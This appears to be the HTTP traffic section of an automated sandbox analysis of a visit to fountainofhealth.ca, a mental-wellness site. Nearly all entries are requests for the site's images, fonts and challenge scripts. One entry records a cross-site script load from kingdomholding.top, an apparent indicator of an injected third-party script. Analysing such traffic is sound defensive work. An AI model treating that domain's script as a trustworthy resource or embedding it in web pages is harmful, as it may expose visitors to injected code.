Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/6fab0cec561d/main.js? HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /ss/index.js?5e7da6cb85fe8b1284 HTTP/1.1Host: kingdomholding.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/0.5962628874685506:1748892536:s7uFNV44_UPqiWGt6NI_R-aJqAg0ni5tg1I2dsZR1CE/94996ae8ea2e4762 HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/Poppins-Regular.ttf HTTP/1.1host: fountainofhealth.caorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=0
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1host: fountainofhealth.causer-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swwsy8accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _ga_WF39Z4TEVT=GS2.1.s1748893175$o1$g0$t1748893175$j60$l0$h0cookie: _ga=GA1.1.1027095347.1748893175priority: i
